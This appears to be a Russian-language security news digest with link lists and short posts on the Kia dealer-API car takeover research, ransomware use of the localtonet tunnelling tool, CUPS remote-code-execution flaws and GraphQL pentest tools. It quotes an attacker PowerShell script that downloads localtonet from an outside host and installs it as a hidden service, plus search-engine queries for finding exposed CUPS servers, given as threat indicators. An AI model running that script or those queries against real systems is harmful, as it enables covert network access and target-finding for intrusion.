Fsecurity | HH

🔗Ссылка: https://www.securitylab.ru/news/552461.php

🔗Ссылка: https://www.anti-malware.ru/news/2024-09-27-114534/44262

🔗Ссылка: https://xakep.ru/2024/09/27/kia-hack/

Hacking Kia: Remotely Controlling Cars With Just a License Plate Для пятничного поста я выбрал такую тему😎 Вообще исследования в сфере безопасности Automotive крайне интересное и востребованное направление, так как любой современный автомобиль по сути представляет собой компьютер на колесах. Легендарный Sam Curry с друзьями на этот раз отломали все модели автомобилей Kia с 2013 года🙈 Эксплуатация обнаруженной узявимости позволяет за 30 сек получить контроль над любым автомобилем зная только VIN код (открыть/закрыть, завести/заглушить, определить местоположение, использовать клаксон🪿) Суть узявимости заключается в том, что аутентификация в API для управления автомобилем используется также для регистрации аккаунта нового счастливого обладателя у диллера. Таким образом атакующий может зарегать аккаунт диллера (просто по кнопке регистрации на сайте😱), по VIN коду получить "one-time grant" токен для регистрации аккаунта и с этим токеном уже ходить в API для управления тачкой🤯 Для наглядной демонстрации исследователи создали POC-приложение, функциональность которого позволяет получить VIN по номеру автомобиля через third-party API, далее получить данные владельца (почту/телефон), поменять владельца с токеном диллера на свои, поехать кататься на новенькой Kia😎 На данный момент уязвимость исправлена, владельцы автомобилей этого популярного бренда могут спать спокойно...по крайней мере до следующей баги😂

🔗Ссылка: https://spy-soft.net/pycript-burp-suite-bypass-encryption/

Вымогатели, использующие Lockbit и Babuk, расширили набор инструментов для организации сетевого доступа во внутреннюю сеть жертвы извне. В новой серии ransomware-атак замечено использование localtonet (localtonet[.]com). Этот инструмент даёт очень удобные фичи атакующим: оператор может удалённо выбирать, к какому сервису и на какой системе внутри сети нужно организовать доступ извне. Настоятельно рекомендуем проверять такие сетевые индикаторы:   localtonet[.]com   *.localtonet[.]com   *.localto[.]net Можно проверять запуски в командных строках и процессах по названиям бинарей – атакующие используют ванильные архивы от разработчика софта. Пример скрипта Powershell по установке localtonet на скомпрометированной системе:

    powershell iwr http[://]localtonet[.]com/download/localtonet-win-64.zip -outfile ltn.zip -usebasicparsing; 
    expand-archive -force -path ltn.zip -destinationpath C:\Windows\Temp; 
    iwr http[://]localtonet[.]com/nssm-2.24.zip -outfile nssm.zip -usebasicparsing; 
    expand-archive -force -path nssm.zip -destinationpath C:\Windows\Temp; 
    C:\Windows\Temp\nssm-2.24\win64\nssm.exe install Win32_Serv C:\Windows\Temp\localtonet.exe authtoken <token>; 
    C:\Windows\Temp\nssm-2.24\win64\nssm.exe start Win32_Serv; 
    rm nssm.zip; 
    rm ltn.zip;

Если подобная активность обнаружена, стоит реагировать по плейбуку борьбы с шифровальщиком – то есть максимально оперативно.

🔗Ссылка: https://blog.exploit.org/caster-against

CVE-2024-47076/CVE-2024-47175/CVE-2024-47176/CVE-2024-47177: Multiple CUPS flaws enable Linux remote code execution A remote unauthenticated attacker can silently replace existing printers’ (or install new ones) IPP urls with a malicious one, resulting in arbitrary command execution (on the computer) when a print job is started (from that computer). PoC: https://github.com/RickdeJager/cupshax This PoC uses dns-sd printer discovery, so the target must be able to receive the broadcast message, i.e. be on the same network. Refer: https://github.com/OpenPrinting/cups-browsed/security/advisories/GHSA-rj88-6mr5-rcw8 Search Query:

HUNTER: header.server="CUPS"
SHODAN: product:"CUPS(IPP)" server: cups
FOFA: server="CUPS"
ZoomEye: app:"CUPS" +title:"CUPS"

P.S. 2.9M+ Services are found on hunter.how yearly

🔗Ссылка: https://habr.com/ru/companies/ozontech/articles/846198/

🔗Ссылка: https://spy-soft.net/mfasweep-brute-force-microsoft/

Автоматизированный пентест GraphQL #graphql #pentest ➡️GraphQL - это открытая технология для создания и взаимодействия с API. Она была создана в 2012 году как альтернативный подход к REST - архитектурному стилю, определяющему принципы взаимодействия клиента и сервера через HTTP-запросы, стандартизированные URL и форматы данных JSON и XML. В отличие от REST API, где ответ на запрос приходит в формате JSON и требует дальнейшего анализа для извлечения нужной информации, GraphQL позволяет получить только необходимые данные за один запрос, даже если они распределены по разным источникам. Это делает GraphQL более эффективным и удобным методом извлечения данных по сравнению с REST. ➡️Основные преимущества GraphQL ▪️Не нужно создавать несколько REST-запросов. Чтобы извлечь данные, достаточно ввести один запрос. ▪️Не привязан к конкретной базе данных или механизму хранения. ▪️Используется целая система типов данных. Более подробно можете ознакомиться в этом видео или в этой статье. ❤️ А теперь перейдём к самой вкусной части | Пентест GraphQL Начнём с классики, это Hacktricks. Но это скучно) Список тулз, которые рекомендуют в интернетах: ➡️graphw00f - тулза делает аудит на основе GraphQL Threat Matrix Project и после скана она выводит отчёт смапленный по этой матрице уязвимостей. ➡️InQL - довольно популярное расширение для BurpSuite, которое позволяет просканировать ендпоинты GraphQL, также можете загрузить json схему в него. Этот режим позволит собрать все эндпоинты в одну центролизованную кучку. Затем перекидываете конкретный эндпоинт во вкладку Attacker и там уже можете в ручном режиме изменять запрос. ➡️Куда же мы без ffuf и хорошего словаря для GraphQL ➡️GraphQL Cop - данная тулза подходит и для пентестеров, и для appsec/devsecops, т.к. очень легко заворачивается в CI/CD. Есть визуально красивый текстовый вывод в консоль, а есть Json вывод. Тулза обнаруживает атаки типа DOS, Раскрытие информации, CSRF. Но как говорится, где одна бага, там и вторая) ➡️Graphinder - добывает все graphql эндпоинты для конкретного домена ➡️GraphQLmap - интересный интерактивный режим. Пример работы ➡️Auto GraphQL Scanner - бурповское расширение по совету от Bo0om ➡️Два визуализатора схем GraphQL, GraphQL Voyager и GraphQL Online ➡️Уже все имплементировали nuclei в свои DAST, поэтому вот шаблон под детект GraphQL ➡️В случае если интроспекция выключена, используем Clairvoyance. Он соберёт для вас json схему. ⚠️ Типичные уязвимости для GraphQL ➡️DOS. GraphQL будут подвержены для этого типа атак, если нет ограничений на глубину запросов. ➡️Сбатченные (batched) запросы и алиасы. К примеру вы установили rate limit на ваши эндпоинты, НО если вы разрешили сбатченные запросы, то хахакер может впихнуть множество запросов в один и тем самым это приведет к DOS или к обходу рейтов. ➡️Некорректная или отсутствующая аутентификация и авторизация ➡️XSS ➡️Arbitrary File Upload & Path Traversal ➡️RCE 🛠 Лабы для тренировок ➡️Portswigger - не очень много тасков, нет прям сложных ➡️DVGA (Damn Vulnerable GraphQL Application) - самая популярная лаба ➡️vuln-graphql-api - малоизвестная лаба (сам ещё не раскатывал) 📌Почитать ещё ➡️Статья от ООО Бастион ➡️Pentesting GraphQL 101 Part 1 / 2 / 3 ➡️GraphQL Pentesting for Dummies! Part- 1 / 2 ➡️GraphQL Cheat Sheet ➡️Документация GraphQL 🌚 @poxek | 📺 RuTube | 🌚 Мерч Похек

🔗Ссылка: https://habr.com/ru/companies/jetinfosystems/articles/846066/

🔗Ссылка: https://spy-soft.net/sysmon-evade/

🔗Ссылка: https://www.anti-malware.ru/news/2024-09-26-111332/44247

🔗Ссылка: https://www.anti-malware.ru/news/2024-09-26-111332/44246

🔗Ссылка: https://habr.com/ru/companies/ruvds/articles/845918/

🔗Ссылка: https://spy-soft.net/install-and-use-curl-new-version/

🔗Ссылка: https://www.securitylab.ru/news/552375.php

🔗Ссылка: https://spy-soft.net/bettercap-can-bus/

🔗Ссылка: https://xakep.ru/2024/09/25/asyncrat-ai-malware/